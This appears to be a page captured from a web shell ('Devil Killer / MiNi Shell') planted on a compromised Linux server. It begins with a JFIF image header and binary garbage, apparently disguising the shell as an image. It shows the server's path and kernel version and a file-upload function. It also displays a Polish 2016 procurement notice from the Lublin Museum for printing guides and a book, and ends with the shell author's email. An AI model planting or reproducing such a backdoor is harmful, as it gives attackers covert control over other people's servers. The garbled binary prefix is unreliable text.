JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160212/14621-N-2016.html

<p class="kh_header"><b>Lublin: wykonanie wydawnictw dla Muzeum Lubelskiego w Lublinie oraz ich dostarczenie do siedziby zamawiającego (magazyn wydawnictw - ul. Zamkowa 9, Lublin) wraz z ich rozładunkiem.</b><br>
<b>Numer ogłoszenia: 14621 - 2016; data zamieszczenia: 12.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Lubelskie w Lublinie , ul. Zamkowa 9, 20-117 Lublin, woj. lubelskie, tel. 081 5325001 w. 13, faks 081 5321743.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.muzeumlubelskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> wykonanie wydawnictw dla Muzeum Lubelskiego w Lublinie oraz ich dostarczenie do siedziby zamawiającego (magazyn wydawnictw - ul. Zamkowa 9, Lublin) wraz z ich rozładunkiem..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1.	Przedmiotem zamówienia jest wykonanie wydawnictw dla Muzeum Lubelskiego
w Lublinie oraz ich dostarczenie do siedziby zamawiającego (magazyn wydawnictw
- ul. Zamkowa 9, Lublin) wraz z ich rozładunkiem.
3.2.	Zakres zamówienia obejmuje wykonanie wydawnictw dla Muzeum Lubelskiego
w Lublinie oraz ich dostarczenie do siedziby zamawiającego (magazyn wydawnictw 
- ul. Zamkowa 9, Lublin) wraz z ich rozładunkiem, następujących wydawnictw:
3.2.1. Informator Zamek wersja polska: 
a)	Wykonawca wydrukuje informator w wersji polskiej w nakładzie 15.000 egz., w kolorze 4 + 4, w formacie 15 x 90 cm, falcowany w harmonijkę na 6 kwadratów 15 x 15 cm, na kredzie 135 g. 
b)	Wykonawca wykona druk offsetowy z gotowych plików PDF, ozalid całości 1:1, proof z obiektów barwnych, obróbkę introligatorską. 
c)	Wszystkie korekty, proofy i ozalidy będą konsultowane osobiście przez przedstawiciela wykonawcy z przedstawicielami Zamawiającego w siedzibie Zamawiającego (nie pocztą ani telefonicznie), w obecności autora projektu graficznego. 
d)	Zamawiający zastrzega sobie prawo do wprowadzenia korekt na etapie ozalidu oraz wykonania przez Wykonawcę kolejnego ozalidu (do 3 ozalidów). 
e)	Zamawiający zastrzega sobie możliwość korekty kolorów, a także konieczność wykonania przez Wykonawcę dodatkowych proofów, aż do uzyskania pożądanej kolorystyki zgodnej z projektem przekazanym przez Zamawiającego. 
f)	Zamawiający zastrzega sobie nadzór autorów projektu graficznego i typograficznego na wszystkich etapach druku. Wykonawca jest zobowiązany do zapewnienia autorom z siedziby Zamawiającego, transportu do i z drukarni.
3.2.2. Informator Zamek wersja angielska: 
a)	Wykonawca wydrukuje informator w wersji angielskiej w nakładzie 10.000 egz., w kolorze 4 + 4, w formacie 15 x 90 cm, falcowany w harmonijkę na 6 kwadratów 15 x 15 cm, na kredzie 135 g. 
b)	Wykonawca wykona druk offsetowy z gotowych plików PDF, ozalid całości 1:1, proof z obiektów barwnych, obróbkę introligatorską. 
c)	Wszystkie korekty, proofy i ozalidy będą konsultowane osobiście przez przedstawiciela wykonawcy z przedstawicielami Zamawiającego w siedzibie Zamawiającego (nie pocztą ani telefonicznie), w obecności autora projektu graficznego.
d)	Zamawiający zastrzega sobie prawo do wprowadzenia korekt na etapie ozalidu oraz wykonania przez Wykonawcę kolejnego ozalidu (do 3 ozalidów).
e)	Zamawiający zastrzega sobie możliwość korekty kolorów aż do uzyskania pożądanej kolorystyki zgodnej z projektem przekazanym przez Zamawiającego, a także konieczność wykonania przez Wykonawcę dodatkowych proofów, aż do uzyskania pożądanej kolorystyki zgodnej z projektem przekazanym przez Zamawiającego.
f)	Zamawiający zastrzega sobie nadzór autorów projektu graficznego i typograficznego na wszystkich etapach druku. Wykonawca jest zobowiązany do zapewnienia autorom z siedziby Zamawiającego, transportu do i z drukarni.
3.2.3. Informator Kaplica wersja polska: 
a)	Wykonawca wydrukuje informator w wersji polskiej w nakładzie 15.000 egz., w kolorze 4 + 1, w formacie 15 x 90 cm, falcowany w harmonijkę na 6 kwadratów 15 x 15 cm, na kredzie 135 g. 
b)	Wykonawca wykona druk offsetowy z gotowych plików PDF, ozalid całości 1:1, proof z obiektów barwnych, obróbkę introligatorską. 
c)	Wszystkie korekty, proofów i ozalidy będą konsultowane osobiście przez przedstawiciela wykonawcy z przedstawicielami Zamawiającego w siedzibie Zamawiającego (nie pocztą ani telefonicznie), w obecności autora projektu graficznego.
d)	Zamawiający zastrzega sobie prawo do wprowadzenia korekt na etapie ozalidu oraz wykonania przez Wykonawcę kolejnego ozalidu (do 3 ozalidów).
e)	Zamawiający zastrzega sobie możliwość korekty kolorów zgodnej z projektem przekazanym przez Zamawiającego, a także konieczność wykonania przez Wykonawcę dodatkowych proofów, aż do uzyskania pożądanej kolorystyki zgodnej z projektem przekazanym przez Zamawiającego.
f)	Zamawiający zastrzega sobie nadzór autorów projektu graficznego i typograficznego na wszystkich etapach druku. Wykonawca jest zobowiązany do zapewnienia autorom z siedziby Zamawiającego, transportu do i z drukarni.
3.2.4. Informator Kaplica wersja angielska: 
a)	Wykonawca wydrukuje informator w wersji polskiej w nakładzie 10.000 egz., w kolorze 4 + 1, w formacie 15 x 90 cm, falcowany w harmonijkę na 6 kwadratów 15 x 15 cm, na kredzie 135 g. 
b)	Wykonawca wykona druk offsetowy z gotowych plików PDF, ozalid całości 1:1, proof z obiektów barwnych, obróbkę introligatorską. 
c)	Wszystkie korekty, proofów i ozalidy będą konsultowane osobiście przez przedstawiciela wykonawcy z przedstawicielami Zamawiającego w siedzibie Zamawiającego (nie pocztą ani telefonicznie), w obecności autora projektu graficznego. 
d)	Zamawiający zastrzega sobie prawo do wprowadzenia korekt na etapie ozalidu oraz wykonania przez Wykonawcę kolejnego ozalidu (do 3 ozalidów). 
e)	Zamawiający zastrzega sobie możliwość korekty kolorów zgodnej z projektem przekazanym przez Zamawiającego, a także konieczność wykonania przez Wykonawcę dodatkowych proofów, aż do uzyskania pożądanej kolorystyki zgodnej z projektem przekazanym przez Zamawiającego. 
f)	Zamawiający zastrzega sobie nadzór autorów projektu graficznego i typograficznego na wszystkich etapach druku. Wykonawca jest zobowiązany do zapewnienia autorom z siedziby Zamawiającego, transportu do i z drukarni.
3.2.5. Lublin-Warszawa-Nancy. Parantele: 
a)	Wykonawca wydrukuje książkę w nakładzie 400 egz., w formacie netto 275 x 235 cm, w pełnym kolorze, o objętości 128 stron, na kredzie 150 g oraz okładkę. miękką ze skrzydełkami po 10 cm, kolor 4 + 0, z kartonu offsetowego 300 g, z folią matową po zewnętrznej stronie okładki, z oprawą szytą, klejoną.
b)	Książka będzie opatrzona numerem ISBN 978-83-61073-02-4. 
c)	Wykonawca wykona druk offsetowy z gotowych plików PDF, ozalid całości 1:1, złożony i przecięty, proof okładki i proof całości materiału ilustracyjnego, obróbkę introligatorską. 
d)	Wszystkie korekty, proofy i ozalidy będą konsultowane osobiście przez przedstawiciela Wykonawcy z przedstawicielami Zamawiającego w siedzibie Zamawiającego (nie pocztą ani telefonicznie), w obecności autora projektu graficznego. Zamawiający zastrzega sobie prawo do wprowadzenia korekt na etapie ozalidu oraz wykonania przez Wykonawcę kolejnego ozalidu (do 3 ozalidów). 
e)	Zamawiający zastrzega sobie nadzór autorów projektu graficznego i typograficznego na wszystkich etapach druku. Wykonawca jest zobowiązany do zapewnienia autorom z siedziby Zamawiającego, transportu do i z drukarni.
g)	Zamawiający zastrzega sobie możliwość korekty kolorów zgodnej z projektem przekazanym przez Zamawiającego, a także konieczność wykonania przez Wykonawcę dodatkowych proofów, aż do uzyskania pożądanej kolorystyki zgodnej z projektem przekazanym przez Zamawiającego. 
3.3.	Zgodnie z art. 29 ust. 3 ustawy Prawo zamówień publicznych Zamawiający w niniejszym postępowaniu dopuszcza składanie ofert równoważnych, a wszelkie towary określone w dokumentacji, pochodzące od konkretnych producentów, określają minimalne parametry jakościowe i cechy użytkowe, jakim muszą odpowiadać towary, aby spełnić wymagania stawiane przez Zamawiającego. Uznaje się, że oferta równoważna to taka, która przedstawia przedmiot zamówienia o właściwościach funkcjonalnych i jakościowych takich samych lub zbliżonych - ale nie gorszych do tych, które zostały zakreślone w SIWZ, lecz oznaczonych innym znakiem towarowym, patentem lub pochodzeniem. Przy czym istotne jest to, że produkt równoważny to produkt, który nie jest identyczny, tożsamy z produktem referencyjnym, ale posiada zbliżone - ale nie gorsze do produktu referencyjnego cechy i parametry.
3.4. Kody wg Wspólnego Słownika Zamówień (CPV): 
79800000-2 usługi drukowania i powiązane.
Wykonawca zobowiązuje się wykonać przedmiot umowy w następujących terminach:
1) 10 dni od dnia podpisania umowy - pierwsza transza (dotyczy wydawnictw: Informator Zamek Wersja polska, Informator Zamek Wersja angielska, Informator Kaplica Wersja polska, Informator Kaplica Wersja angielska).
2) do dnia 24 marca 2016 r. - druga transza (dotyczy wydawnictwa: Lublin-Warszawa-Nancy. Parantele)..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.80.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 24.03.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie ma wymogu wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1Oświadczenie oraz dokumenty wymagane w pkt 6 specyfikacji istotnych warunków zamówienia.
2 Formularz ofertowy (wg załącznika nr 6) - w przypadku składania oferty przez podmioty występujące wspólnie należy podać nazwy (firmy) oraz dokładne adresy wszystkich wykonawców składających ofertę wspólną.
3Kosztorys ofertowy (formularz cenowy) - zgodnie z załącznikiem nr 3 do SIWZ
4 Pełnomocnictwo do reprezentowania w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy, w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 23 ustawy Pzp (dotyczy również wspólników spółki cywilnej).
5. Pełnomocnictwo do występowania w imieniu wykonawcy, w przypadku gdy dokumenty składające się na ofertę nie podpisuje osoba, której umocowanie do reprezentowania wykonawcy nie będzie wynikać z dokumentów załączonych do oferty.
6.Wykonawca w sytuacji, gdy polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków,  zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.
Dokument, wymagany w pkt. 6 winien określać w szczególności:
-. zakres dostępnych wykonawcy zasobów innego podmiotu,
-sposób wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia,
-charakter stosunku, jaki będzie łączył wykonawcę z innym podmiotem,
-zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - termin płatności - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. W razie istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach zgodnie z art. 145 ustawy Prawo zamówień publicznych.
2.  W przypadku, o którym mowa w ust. 1, wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu wykonania części umowy.
3. Zamawiający może także odstąpić od umowy w całości lub w części w przypadku gdy:
1) Wykonawca z przyczyn od siebie zawinionych opóźnia się z rozpoczęciem lub zakończeniem prac tak dalece, że nie jest prawdopodobne żeby zdołał zakończyć prace stanowiące przedmiot niniejszej umowy w umówionym terminie. 
2)	Wykonawca, pomimo wezwania przez Zamawiającego do realizacji umowy zgodnie z jej postanowieniami, wykonuje przedmiot umowy w sposób wadliwy lub sprzeczny z jej warunkami a w szczególności wykonuje przedmiot umowy niezgodnie z postanowieniami § 2 umowy,
3)	Wykonawca nie wykonał lub nienależycie wykonał przedmiot umowy.
4. Odstąpienie z przyczyn określonych w ust. 3 może nastąpić w terminie 14 dni od dnia powzięcia wiadomości o okolicznościach uzasadniających odstąpienie. 
5. Odstąpienie od umowy powinno nastąpić w formie pisemnej pod rygorem nieważności i powinno zawierać uzasadnienie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.muzeumlubelskie.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Muzeum Lubelskie w Lublinie, ul. Zamkowa 9, 20-117 Lublin, pokój nr 32..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.02.2016 godzina 10:00, miejsce: Muzeum Lubelskie w Lublinie, ul. Zamkowa 9, 20-117 Lublin, pokój nr 32..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Adres strony internetowej, na której zamieszczone jest ogłoszenie o zamówieniu oraz
specyfikacja istotnych warunków zamówienia: http://www.muzeumlubelskie.pl/
 w zakładce zamowienia_publiczne/Postepowania_powyzej_kwoty_30_000 euro.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com